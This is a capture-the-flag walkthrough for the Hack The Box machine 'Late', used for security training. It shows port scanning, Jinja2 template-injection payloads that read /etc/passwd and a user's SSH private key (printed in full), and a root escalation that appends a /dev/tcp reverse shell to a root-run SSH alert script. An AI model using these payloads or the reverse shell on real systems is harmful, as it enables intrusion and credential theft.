---
sidebar_label: 🕝 Late
description: ''
last_update:
  date: 2022/07/12
  author: Raúl Sánchez
tags:
  - SSTI
  - netcat
keywords: 
  - Hack The Box
  - HTB
  - HTB Writeups
  - Hacking
  - HTB Walkthrough
  - Write-up
  - Walkthrough
---

# Late

![](late1.png)

> An easy machine where we will learn about **SSTI** (Server Side Template Injection) and privilege escalation with **SUDO** and **SUID** vulnerabilities.

:::caution Disclaimer
No flags (user/root) are shown in this **writeup**, so follow the procedures to grab the flags! Enjoy! 👽️
:::

## Setting-up the Environment

First of all, start the machine and now we are going to use this [**script**](https://github.com/RaulSanchezzt/dotfiles/blob/master/scripts/htb.sh) to add the IP address and hostname of this box to the **hosts** file, **allow connections from the target** to our machine and create our working directory. I have defined the path of the script in the [`.zshrc`](https://github.com/RaulSanchezzt/dotfiles/blob/master/.zshrc) file.

```bash
❯ which htb
htb: aliased to sh ~/dotfiles/scripts/htb.sh
```

We will run the script and write the information of this machine.

```python
❯ htb
[!] /etc/hosts file restored from /etc/hosts.bak
[?] Type the IP address of the box: 10.10.11.156
[?] Type the name of the box: Late

[!] Hack The Box Machine
10.10.11.156 Late.htb

[!] Firewall
Status: active

     To                         Action      From
     --                         ------      ----
[ 1] Anywhere                   ALLOW IN    10.10.11.156              

[!] Working directory created
[!] Initial configuration completed
```

## 1. Enumeration

Now we can simply ping to domain name of the machine to check our **VPN** connection and whether machine is alive. Sometimes machines might "Disable" ping requests from passing through the firewall. But in most case ping will be a success!

```python
❯ ping -c1 late.htb
PING Late.htb (10.10.11.156) 56(84) bytes of data.
64 bytes from Late.htb (10.10.11.156): icmp_seq=1 ttl=63 time=49.4 ms

--- Late.htb ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 49.357/49.357/49.357/0.000 ms
```

To identify which operating system is the target running. We will use the [whichSystem.py](https://github.com/RaulSanchezzt/kali-bspmw/blob/master/tools/whichSystem.py) tool.

```python
❯ whichSystem.py late.htb

late.htb (ttl -> 63): Linux
```

:::info
By default Linux has a TTL of 64 and Windows has 128.
:::info

### 1.1 Nmap

Then, we will use the [nmap](https://nmap.org/) tool with the following parameters:

* [-p-](https://nmap.org/book/nmap-overview-and-demos.html) : scan every TCP port \[0-65535].
* [--open](https://nmap.org/book/man-port-scanning-basics.html) : show only the applications that are actively accepting TCP connections.
* [-sS](https://nmap.org/book/man-port-scanning-techniques.html) : set TCP SYN scan.
* [--min-rate 5000](https://nmap.org/book/man-performance.html) : send packets as fast as or faster than the given rate.
* [-vvv](https://nmap.org/book/osdetect-usage.html#osdetect-ex-scanme1) : increase the verbosity.
* [-n](https://nmap.org/book/host-discovery-dns.html) : No DNS resolution.
* [-Pn](https://nmap.org/book/man-host-discovery.html) : No Ping.
* {name}.htb : Target machine.
* [-oG](https://nmap.org/book/output-formats-grepable-output.html) : Grepeable output.
* allPorts : Output file name.

```python
❯ sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn late.htb -oG allPorts
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-05 17:07 CEST
Initiating SYN Stealth Scan at 17:07
Scanning late.htb (10.10.11.156) [65535 ports]
Discovered open port 80/tcp on 10.10.11.156
Discovered open port 22/tcp on 10.10.11.156
Completed SYN Stealth Scan at 17:07, 14.97s elapsed (65535 total ports)
Nmap scan report for late.htb (10.10.11.156)
Host is up, received user-set (0.13s latency).
Scanned at 2022-07-05 17:07:07 CEST for 15s
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 15.08 seconds
           Raw packets sent: 74538 (3.280MB) | Rcvd: 74522 (2.981MB)
```

This is the function that I have defined in the [zsh](https://github.com/RaulSanchezzt/dotfiles/blob/master/.zshrc) configuration file to extract TCP ports.

```bash
❯ which extractPorts
extractPorts () {
    ports="$(cat $1 | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ',')" 
    ip_address="$(cat $1 | grep -oP '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}' | sort -u | head -n 1)" 
    echo -e "\n${yellowColour}[*] Extracting information...${endColour}\n"
    echo -e "\t${grayColour}[*] IP Address:${endColour} ${greenColour} $ip_address${endColour}"
    echo -e "\t${grayColour}[*] Open ports:${endColour} ${redColour} $ports${endColour}\n"
    echo $ports | tr -d '\n' | xclip -sel clip
    echo -e "${blueColour}[*] Ports copied to clipboard${endColour}\n"
}
}
```

Use the command to extract the **TCP ports**.

```python
❯ extractPorts allPorts

[*] Extracting information...

    [*] IP Address:  10.10.11.156
    [*] Open ports:  22,80

[*] Ports copied to clipboard
```

We will see the open ports on the target machine so now, we are going to use [nmap](https://nmap.org/) again using the parameters below:

* [-sV](https://nmap.org/book/man-version-detection.html) : to see the services and their version.
* [-sC](https://nmap.org/book/man-nse.html) : to performs a script scan using the default set of scripts.
* [-Pn](https://nmap.org/book/man-host-discovery.html) : No Ping.
* [-p](https://nmap.org/book/scan-methods-ip-protocol-scan.html) : to determine which IP protocols are supported by target machine.
* {name}.htb : Target machine.
* [-oN](https://nmap.org/book/output-formats-normal-output.html) : Normal output.
* targeted : Output file name.

```python
❯ nmap -sV -sC -Pn -p22,80 late.htb -oN targeted
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-05 17:08 CEST
Nmap scan report for late.htb (10.10.11.156)
Host is up (0.13s latency).
rDNS record for 10.10.11.156: Late.htb

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
|   256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_  256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.76 seconds
```

As we see, there are open two ports, SSH and HTTP running in nginx.

:::info
You can find the man page of nmap [here](https://nmap.org/book/toc.html).
:::info

### 1.2 Web

On the web page you will find a link to another page with the same domain name.

![](late2.png)

But we will not be able to access.

![](late3.png)

To fix this, we will add the domain name `images.late.htb` to the **hosts** file.

```bash
[!] Hack The Box Machine
10.10.11.156 Late.htb images.late.htb
```

Now we can see the page to convert images to text.

![](late4.png)

### 1.3 Detect a SSTI

Let's follow this [article](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#detect) to detect if this site has a **`SSTI`** vulnerability. First we will create a plain text file with the following content.

```python
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
```

Then we can use a converter to transform it to `.png` or `.jpg` format or, in this case, we will use the **`cat`** command to print the content on the screen and capture the output with [**flameshot**](https://flameshot.org/).

![](late5.png)

We will upload this image to the web to convert it to text.

![](late6.png)

When the image is scanned, a **result** will be downloaded. In the output we will see some results of the mathematical operations which means we have a **SSTI vulnerability**.

```python
<p>49
${7*7}

<= T*7
$49
#77}
</p>
```

Let's try to read the **`passwd`** file to know the users of the system using the same [article](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#jinja2-python). Upload an image with the following content:

```python
{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
```

Like this image.

![](late7.png)

Upload it to the server like we did before.

![](late8.png)

The server will respond with a plain text file with the contents of the `passwd` file. Where we will find the user **`svc_acc`**.

```bash
❯ cat results.txt
───────┬─────────────────────────────────────────────────────────────────────────────────
       │ File: passwd.txt
───────┼─────────────────────────────────────────────────────────────────────────────────
   1   │ <p>root:x:0:0:root:/root:/bin/bash
   2   │ daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
   3   │ bin:x:2:2:bin:/bin:/usr/sbin/nologin
   4   │ sys:x:3:3:sys:/dev:/usr/sbin/nologin
   5   │ sync:x:4:65534:sync:/bin:/bin/sync
   6   │ games:x:5:60:games:/usr/games:/usr/sbin/nologin
   7   │ man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
   8   │ lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
   9   │ mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  10   │ news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  11   │ uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  12   │ proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  13   │ www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  14   │ backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
  15   │ list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
  16   │ irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
  17   │ gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologi
       │ n
  18   │ nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
  19   │ systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/
       │ sbin/nologin
  20   │ systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nol
       │ ogin
  21   │ syslog:x:102:106::/home/syslog:/usr/sbin/nologin
  22   │ messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
  23   │ _apt:x:104:65534::/nonexistent:/usr/sbin/nologin
  24   │ lxd:x:105:65534::/var/lib/lxd/:/bin/false
  25   │ uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
  26   │ dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
  27   │ landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
  28   │ pollinate:x:109:1::/var/cache/pollinate:/bin/false
  29   │ sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
  30   │ svc_acc:x:1000:1000:Service Account:/home/svc_acc:/bin/bash
  31   │ rtkit:x:111:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
  32   │ usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
  33   │ avahi:x:113:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
  34   │ cups-pk-helper:x:114:117:user for cups-pk-helper service,,,:/home/cups-pk-helper
       │ :/usr/sbin/nologin
  35   │ saned:x:115:119::/var/lib/saned:/usr/sbin/nologin
  36   │ colord:x:116:120:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/no
       │ login
  37   │ pulse:x:117:121:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
  38   │ geoclue:x:118:123::/var/lib/geoclue:/usr/sbin/nologin
  39   │ smmta:x:119:124:Mail Transfer Agent,,,:/var/lib/sendmail:/usr/sbin/nologin
  40   │ smmsp:x:120:125:Mail Submission Program,,,:/var/lib/sendmail:/usr/sbin/nologin
  41   │ 
  42   │ 
  43   │ </p>
───────┴─────────────────────────────────────────────────────────────────────────────────
```

Now that we know who the user is (`svc_acc`) let's try to download his **ssh** key using this image.

![](late9.png)

Upload it to the server like before.

![](late10.png)

In this way we will obtain the **ssh** private key of the user `svc_acc`.

```bash
❯ cat results.txt
───────┬─────────────────────────────────────────────────────────────────────────────────
       │ File: results.txt
───────┼─────────────────────────────────────────────────────────────────────────────────
   1   │ <p>-----BEGIN RSA PRIVATE KEY-----
   2   │ MIIEpAIBAAKCAQEAqe5XWFKVqleCyfzPo4HsfRR8uF/P/3Tn+fiAUHhnGvBBAyrM
   3   │ HiP3S/DnqdIH2uqTXdPk4eGdXynzMnFRzbYb+cBa+R8T/nTa3PSuR9tkiqhXTaEO
   4   │ bgjRSynr2NuDWPQhX8OmhAKdJhZfErZUcbxiuncrKnoClZLQ6ZZDaNTtTUwpUaMi
   5   │ /mtaHzLID1KTl+dUFsLQYmdRUA639xkz1YvDF5ObIDoeHgOU7rZV4TqA6s6gI7W7
   6   │ d137M3Oi2WTWRBzcWTAMwfSJ2cEttvS/AnE/B2Eelj1shYUZuPyIoLhSMicGnhB7
   7   │ 7IKpZeQ+MgksRcHJ5fJ2hvTu/T3yL9tggf9DsQIDAQABAoIBAHCBinbBhrGW6tLM
   8   │ fLSmimptq/1uAgoB3qxTaLDeZnUhaAmuxiGWcl5nCxoWInlAIX1XkwwyEb01yvw0
   9   │ ppJp5a+/OPwDJXus5lKv9MtCaBidR9/vp9wWHmuDP9D91MKKL6Z1pMN175GN8jgz
  10   │ W0lKDpuh1oRy708UOxjMEalQgCRSGkJYDpM4pJkk/c7aHYw6GQKhoN1en/7I50IZ
  11   │ uFB4CzS1bgAglNb7Y1bCJ913F5oWs0dvN5ezQ28gy92pGfNIJrk3cxO33SD9CCwC
  12   │ T9KJxoUhuoCuMs00PxtJMymaHvOkDYSXOyHHHPSlIJl2ZezXZMFswHhnWGuNe9IH
  13   │ Ql49ezkCgYEA0OTVbOT/EivAuu+QPaLvC0N8GEtn7uOPu9j1HjAvuOhom6K4troi
  14   │ WEBJ3pvIsrUlLd9J3cY7ciRxnbanN/Qt9rHDu9Mc+W5DQAQGPWFxk4bM7Zxnb7Ng
  15   │ Hr4+hcK+SYNn5fCX5qjmzE6c/5+sbQ20jhl20kxVT26MvoAB9+I1ku8CgYEA0EA7
  16   │ t4UB/PaoU0+kz1dNDEyNamSe5mXh/Hc/mX9cj5cQFABN9lBTcmfZ5R6I0ifXpZuq
  17   │ 0xEKNYA3HS5qvOI3dHj6O4JZBDUzCgZFmlI5fslxLtl57WnlwSCGHLdP/knKxHIE
  18   │ uJBIk0KSZBeT8F7IfUukZjCYO0y4HtDP3DUqE18CgYBgI5EeRt4lrMFMx4io9V3y
  19   │ 3yIzxDCXP2AdYiKdvCuafEv4pRFB97RqzVux+hyKMthjnkpOqTcetysbHL8k/1pQ
  20   │ GUwuG2FQYrDMu41rnnc5IGccTElGnVV1kLURtqkBCFs+9lXSsJVYHi4fb4tZvV8F
  21   │ ry6CZuM0ZXqdCijdvtxNPQKBgQC7F1oPEAGvP/INltncJPRlfkj2MpvHJfUXGhMb
  22   │ Vh7UKcUaEwP3rEar270YaIxHMeA9OlMH+KERW7UoFFF0jE+B5kX5PKu4agsGkIfr
  23   │ kr9wto1mp58wuhjdntid59qH+8edIUo4ffeVxRM7tSsFokHAvzpdTH8Xl1864CI+
  24   │ Fc1NRQKBgQDNiTT446GIijU7XiJEwhOec2m4ykdnrSVb45Y6HKD9VS6vGeOF1oAL
  25   │ K6+2ZlpmytN3RiR9UDJ4kjMjhJAiC7RBetZOor6CBKg20XA1oXS7o1eOdyc/jSk0
  26   │ kxruFUgLHh7nEx/5/0r8gmcoCvFn98wvUPSNrgDJ25mnwYI0zzDrEw==
  27   │ -----END RSA PRIVATE KEY-----
  28   │ 
  29   │ 
  30   │ </p>
───────┴─────────────────────────────────────────────────────────────────────────────────
```

## 2. Foothold

Remove the `<p>` tags and run the following commands to give the necessary permissions.

```bash
❯ vim results.txt 
❯ chmod 600 results.txt
```

We now have a `SSH connection`. Let’s get the **user flag**!

```bash
❯ ssh -i results.txt svc_acc@late.htb
The authenticity of host 'late.htb (10.10.11.156)' can't be established.
ED25519 key fingerprint is SHA256:LsThZBhhwN3ctG27voIMK8bWCmPJkR4iDV9eb/adDOc.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'late.htb' (ED25519) to the list of known hosts.
svc_acc@late:~$ whoami
svc_acc
svc_acc@late:~$ ls
app  file  linpeace.sh  user.txt
svc_acc@late:~$ cat user.txt
```

### 2.1 Privilege Escalation

Using [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) I noticed something interesting at `/usr/local/sbin`.

```bash
svc_acc@late:~$ sh linpeace.sh
╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/home/svc_acc/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
New path exported: /home/svc_acc/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
```

A file named `ssh-alert.sh` is ran by **root** user and runs every time some user connects to **SSH**.

```bash
svc_acc@late:~$ cd /usr/local/sbin/
svc_acc@late:/usr/local/sbin$ ls
ssh-alert.sh
svc_acc@late:/usr/local/sbin$ cat ssh-alert.sh 
#!/bin/bash

RECIPIENT="root@late.htb"
SUBJECT="Email from Server Login: SSH Alert"

BODY="
A SSH login was detected.

        User:        $PAM_USER
        User IP Host: $PAM_RHOST
        Service:     $PAM_SERVICE
        TTY:         $PAM_TTY
        Date:        `date`
        Server:      `uname -a`
"

if [ ${PAM_TYPE} = "open_session" ]; then
        echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}
fi
```

Now we will open another **shell** and listen for connections on port `4444`.

```bash
❯ nc -lvnp 4444
listening on [any] 4444 ...
```

Then, we will add the following line, so that the next time it is executed, it will send us a **reverse shell** to our computer. **Restart** the ssh session to run the script we have modified.

```bash
svc_acc@late:/usr/local/sbin$ echo "sh -i >& /dev/tcp/10.10.14.81/4444 0>&1" >> ssh-alert.sh
svc_acc@late:/usr/local/sbin$ exit
logout
Connection to late.htb closed.
❯ ssh -i results.txt svc_acc@late.htb
```

Back to the `net-cat` terminal, we will get a **reverse shell** with the root **user**. And we will get the **root flag**!

```bash
❯ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.81] from (UNKNOWN) [10.10.11.156] 41174
sh: 0: can't access tty; job control turned off
# whoami
root
# cd /root      
# ls
root.txt
scripts
# cat root.txt
```

I hope you made it too, see you next timee! 🙃
